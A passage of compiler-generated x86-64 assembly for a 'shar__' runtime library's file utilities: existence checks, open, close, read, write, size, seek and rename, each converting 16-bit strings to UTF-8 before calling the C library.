QWORD PTR -184[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -168[rbp], rax cmp QWORD PTR -168[rbp], 0 sete al movzx eax, al test rax, rax je .L187 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L187: mov rax, QWORD PTR -168[rbp] mov QWORD PTR -240[rbp], rax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -240[rbp] mov QWORD PTR -264[rbp], rax lea rdx, -160[rbp] mov rax, QWORD PTR -264[rbp] mov rsi, rdx mov rdi, rax call stat@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al mov rax, QWORD PTR -264[rbp] mov rdi, rax call free@PLT cmp BYTE PTR -268[rbp], 0 je .L190 mov eax, DWORD PTR -136[rbp] and eax, 16384 test eax, eax jne .L190 mov eax, 1 jmp .L191 .L190: mov eax, 0 .L191: mov BYTE PTR -268[rbp], al and BYTE PTR -268[rbp], 1 movzx eax, BYTE PTR -268[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L193 call __stack_chk_fail@PLT .L193: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE19: .size shar__file__is__exist, .-shar__file__is__exist .globl shar__directory__is__exist .type shar__directory__is__exist, @function shar__directory__is__exist: .LFB20: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 288 mov QWORD PTR -280[rbp], rdi mov QWORD PTR -288[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -280[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -288[rbp] mov QWORD PTR -248[rbp], rax mov QWORD PTR -240[rbp], 0 mov QWORD PTR -232[rbp], 0 mov QWORD PTR -224[rbp], 0 mov QWORD PTR -216[rbp], 0 jmp .L196 .L208: mov rax, QWORD PTR -216[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -248[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -266[rbp], ax mov BYTE PTR -267[rbp], 0 cmp WORD PTR -266[rbp], 0 je .L216 cmp WORD PTR -266[rbp], 127 ja .L199 mov BYTE PTR -267[rbp], 1 jmp .L200 .L199: cmp WORD PTR -266[rbp], 2047 ja .L201 mov BYTE PTR -267[rbp], 2 jmp .L200 .L201: mov BYTE PTR -267[rbp], 3 .L200: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -224[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -192[rbp], rax cmp QWORD PTR -192[rbp], 0 sete al movzx eax, al test rax, rax je .L202 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L202: mov rax, QWORD PTR -192[rbp] mov QWORD PTR -240[rbp], rax movzx eax, BYTE PTR -267[rbp] cmp eax, 3 je .L204 cmp eax, 3 jg .L205 cmp eax, 1 je .L206 cmp eax, 2 je .L207 jmp .L205 .L206: mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx movzx edx, WORD PTR -266[rbp] mov BYTE PTR [rax], dl jmp .L205 .L207: movzx eax, WORD PTR -266[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L205 .L204: movzx eax, WORD PTR -266[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L205: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -232[rbp], rax jmp .L198 .L216: nop .L198: add QWORD PTR -216[rbp], 1 .L196: mov rax, QWORD PTR -256[rbp] cmp rax, QWORD PTR -216[rbp] ja .L208 mov rax, QWORD PTR -224[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], rdx mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -184[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -168[rbp], rax cmp QWORD PTR -168[rbp], 0 sete al movzx eax, al test rax, rax je .L209 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L209: mov rax, QWORD PTR -168[rbp] mov QWORD PTR -240[rbp], rax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -240[rbp] mov QWORD PTR -264[rbp], rax lea rdx, -160[rbp] mov rax, QWORD PTR -264[rbp] mov rsi, rdx mov rdi, rax call stat@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al mov rax, QWORD PTR -264[rbp] mov rdi, rax call free@PLT cmp BYTE PTR -268[rbp], 0 je .L212 mov eax, DWORD PTR -136[rbp] and eax, 16384 test eax, eax je .L212 mov eax, 1 jmp .L213 .L212: mov eax, 0 .L213: mov BYTE PTR -268[rbp], al and BYTE PTR -268[rbp], 1 movzx eax, BYTE PTR -268[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L215 call __stack_chk_fail@PLT .L215: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE20: .size shar__directory__is__exist, .-shar__directory__is__exist .globl shar__open__file .type shar__open__file, @function shar__open__file: .LFB21: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov QWORD PTR -136[rbp], rdi mov QWORD PTR -144[rbp], rsi mov DWORD PTR -148[rbp], edx mov QWORD PTR -160[rbp], rcx mov rax, QWORD PTR -136[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -144[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L218 .L230: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -114[rbp], ax mov BYTE PTR -115[rbp], 0 cmp WORD PTR -114[rbp], 0 je .L235 cmp WORD PTR -114[rbp], 127 ja .L221 mov BYTE PTR -115[rbp], 1 jmp .L222 .L221: cmp WORD PTR -114[rbp], 2047 ja .L223 mov BYTE PTR -115[rbp], 2 jmp .L222 .L223: mov BYTE PTR -115[rbp], 3 .L222: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L224 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L224: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -115[rbp] cmp eax, 3 je .L226 cmp eax, 3 jg .L227 cmp eax, 1 je .L228 cmp eax, 2 je .L229 jmp .L227 .L228: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -114[rbp] mov BYTE PTR [rax], dl jmp .L227 .L229: movzx eax, WORD PTR -114[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L227 .L226: movzx eax, WORD PTR -114[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L227: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -72[rbp], rax jmp .L220 .L235: nop .L220: add QWORD PTR -56[rbp], 1 .L218: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L230 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L231 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L231: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -112[rbp], rax lea rdx, -148[rbp] mov rax, QWORD PTR -112[rbp] mov rsi, rdx mov rdi, rax call fopen@PLT mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -112[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -160[rbp] mov rdx, QWORD PTR -104[rbp] mov QWORD PTR [rax], rdx cmp QWORD PTR -104[rbp], 0 setne al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE21: .size shar__open__file, .-shar__open__file .globl shar__flush__file .type shar__flush__file, @function shar__flush__file: .LFB22: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rdi, rax call fflush@PLT test eax, eax sete al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE22: .size shar__flush__file, .-shar__flush__file .globl shar__close__file .type shar__close__file, @function shar__close__file: .LFB23: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rdi, rax call fclose@PLT test eax, eax sete al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE23: .size shar__close__file, .-shar__close__file .globl shar__read__from__file .type shar__read__from__file, @function shar__read__from__file: .LFB24: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov rcx, QWORD PTR -24[rbp] mov rdx, QWORD PTR -32[rbp] mov rax, QWORD PTR -40[rbp] mov esi, 1 mov rdi, rax call fread@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE24: .size shar__read__from__file, .-shar__read__from__file .globl shar__write__to__file .type shar__write__to__file, @function shar__write__to__file: .LFB25: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov rcx, QWORD PTR -24[rbp] mov rdx, QWORD PTR -32[rbp] mov rax, QWORD PTR -40[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE25: .size shar__write__to__file, .-shar__write__to__file .globl shar__get__file__size .type shar__get__file__size, @function shar__get__file__size: .LFB26: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 304 mov QWORD PTR -296[rbp], rdi mov QWORD PTR -304[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -296[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -304[rbp] mov QWORD PTR -248[rbp], rax mov QWORD PTR -240[rbp], 0 mov QWORD PTR -232[rbp], 0 mov QWORD PTR -224[rbp], 0 mov QWORD PTR -216[rbp], 0 jmp .L245 .L257: mov rax, QWORD PTR -216[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -248[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -274[rbp], ax mov BYTE PTR -275[rbp], 0 cmp WORD PTR -274[rbp], 0 je .L267 cmp WORD PTR -274[rbp], 127 ja .L248 mov BYTE PTR -275[rbp], 1 jmp .L249 .L248: cmp WORD PTR -274[rbp], 2047 ja .L250 mov BYTE PTR -275[rbp], 2 jmp .L249 .L250: mov BYTE PTR -275[rbp], 3 .L249: movzx eax, BYTE PTR -275[rbp] add QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -224[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -192[rbp], rax cmp QWORD PTR -192[rbp], 0 sete al movzx eax, al test rax, rax je .L251 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L251: mov rax, QWORD PTR -192[rbp] mov QWORD PTR -240[rbp], rax movzx eax, BYTE PTR -275[rbp] cmp eax, 3 je .L253 cmp eax, 3 jg .L254 cmp eax, 1 je .L255 cmp eax, 2 je .L256 jmp .L254 .L255: mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx movzx edx, WORD PTR -274[rbp] mov BYTE PTR [rax], dl jmp .L254 .L256: movzx eax, WORD PTR -274[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -274[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L254 .L253: movzx eax, WORD PTR -274[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -274[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -274[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L254: movzx eax, BYTE PTR -275[rbp] add QWORD PTR -232[rbp], rax jmp .L247 .L267: nop .L247: add QWORD PTR -216[rbp], 1 .L245: mov rax, QWORD PTR -256[rbp] cmp rax, QWORD PTR -216[rbp] ja .L257 mov rax, QWORD PTR -224[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], rdx mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -184[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -168[rbp], rax cmp QWORD PTR -168[rbp], 0 sete al movzx eax, al test rax, rax je .L258 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L258: mov rax, QWORD PTR -168[rbp] mov QWORD PTR -240[rbp], rax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -240[rbp] mov QWORD PTR -264[rbp], rax lea rdx, -160[rbp] mov rax, QWORD PTR -264[rbp] mov rsi, rdx mov rdi, rax call stat@PLT test eax, eax sete al mov BYTE PTR -276[rbp], al cmp BYTE PTR -276[rbp], 0 je .L261 mov eax, DWORD PTR -136[rbp] and eax, 16384 test eax, eax jne .L261 mov eax, 1 jmp .L262 .L261: mov eax, 0 .L262: mov BYTE PTR -276[rbp], al and BYTE PTR -276[rbp], 1 cmp BYTE PTR -276[rbp], 0 je .L263 mov rax, QWORD PTR -112[rbp] mov QWORD PTR -272[rbp], rax jmp .L264 .L263: mov QWORD PTR -272[rbp], -1 .L264: mov rax, QWORD PTR -264[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -272[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L266 call __stack_chk_fail@PLT .L266: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE26: .size shar__get__file__size, .-shar__get__file__size .globl shar__get__position__in__file .type shar__get__position__in__file, @function shar__get__position__in__file: .LFB27: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rdi, rax call ftell@PLT leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE27: .size shar__get__position__in__file, .-shar__get__position__in__file .globl shar__set__position__in__file .type shar__set__position__in__file, @function shar__set__position__in__file: .LFB28: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rcx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov edx, 0 mov rsi, rcx mov rdi, rax call fseek@PLT test eax, eax sete al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE28: .size shar__set__position__in__file, .-shar__set__position__in__file .globl shar__file__rename .type shar__file__rename, @function shar__file__rename: .LFB29: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 256 mov QWORD PTR -232[rbp], rdi mov QWORD PTR -240[rbp], rsi mov QWORD PTR -248[rbp], rdx mov QWORD PTR -256[rbp], rcx mov rax, QWORD PTR -232[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L273 .L285: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -210[rbp], ax mov BYTE PTR -213[rbp], 0 cmp WORD PTR -210[rbp], 0 je .L306 cmp WORD PTR -210[rbp], 127 ja .L276 mov BYTE PTR -213[rbp], 1 jmp .L277 .L276: cmp WORD PTR -210[rbp], 2047 ja .L278 mov BYTE PTR -213[rbp], 2 jmp .L277 .L278: mov BYTE PTR -213[rbp], 3 .L277: movzx eax, BYTE PTR -213[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L279 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L279: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -213[rbp] cmp eax, 3 je .L281 cmp eax, 3 jg .L282 cmp eax, 1 je .L283 cmp eax, 2 je .L284 jmp .L282 .L283: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -210[rbp] mov BYTE PTR [rax], dl jmp .L282 .L284: movzx eax, WORD PTR -210[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -210[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L282 .L281: movzx eax, WORD PTR -210[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -210[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -210[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L282: movzx eax, BYTE PTR -213[rbp] add QWORD PTR -72[rbp], rax jmp .L275 .L306: nop .L275: add QWORD PTR -56[rbp], 1 .L273: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L285 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L286 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L286: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -248[rbp] mov QWORD PTR -192[rbp], rax mov rax, QWORD PTR -256[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], 0 mov QWORD PTR -168[rbp], 0 mov QWORD PTR -160[rbp], 0 mov QWORD PTR -152[rbp], 0 jmp .L289 .L301: mov rax, QWORD PTR -152[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -184[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -212[rbp], ax mov BYTE PTR -214[rbp], 0 cmp WORD PTR -212[rbp], 0 je .L307 cmp WORD PTR -212[rbp], 127 ja .L292 mov BYTE PTR -214[rbp], 1 jmp .L293 .L292: cmp WORD PTR -212[rbp], 2047 ja .L294 mov BYTE PTR -214[rbp], 2 jmp .L293 .L294: mov BYTE PTR -214[rbp], 3 .L293: movzx eax, BYTE PTR -214[rbp] add QWORD PTR -160[rbp], rax mov rax, QWORD PTR -176[rbp] mov QWORD PTR -144[rbp], rax mov rax, QWORD PTR -160[rbp] mov QWORD PTR -136[rbp], rax mov rdx, QWORD PTR -136[rbp] mov rax, QWORD PTR -144[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -128[rbp], rax cmp QWORD PTR -128[rbp], 0 sete al movzx eax, al test rax, rax je .L295 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L295: mov rax, QWORD PTR -128[rbp] mov QWORD PTR -176[rbp], rax movzx eax, BYTE PTR -214[rbp] cmp eax, 3 je .L297 cmp eax, 3 jg .L298 cmp eax, 1 je .L299 cmp eax, 2 je .L300 jmp .L298 .L299: mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx movzx edx, WORD PTR -212[rbp] mov BYTE PTR [rax], dl jmp .L298 .L300: movzx eax, WORD PTR -212[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L298 .L297: movzx eax, WORD PTR -212[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -212[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -168[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -176[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L298: movzx eax, BYTE PTR -214[rbp] add QWORD PTR -168[rbp], rax jmp .L291 .L307: nop .L291: add QWORD PTR -152[rbp], 1 .L289: mov rax, QWORD PTR -192[rbp] cmp rax, QWORD PTR -152[rbp] ja .L301 mov rax, QWORD PTR -160[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -176[rbp] mov QWORD PTR -120[rbp], rax mov QWORD PTR -112[rbp], rdx mov rdx, QWORD PTR -112[rbp] mov rax, QWORD PTR -120[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -104[rbp], rax cmp QWORD PTR -104[rbp], 0 sete al movzx eax, al test rax, rax je .L302 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L302: mov rax, QWORD PTR -104[rbp] mov QWORD PTR -176[rbp], rax mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -168[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -176[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call rename@PLT test eax, eax sete al mov BYTE PTR -215[rbp], al mov rax, QWORD PTR -208[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -200[rbp] mov rdi, rax call free@PLT movzx eax, BYTE PTR -215[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE29: .size shar__file__rename, 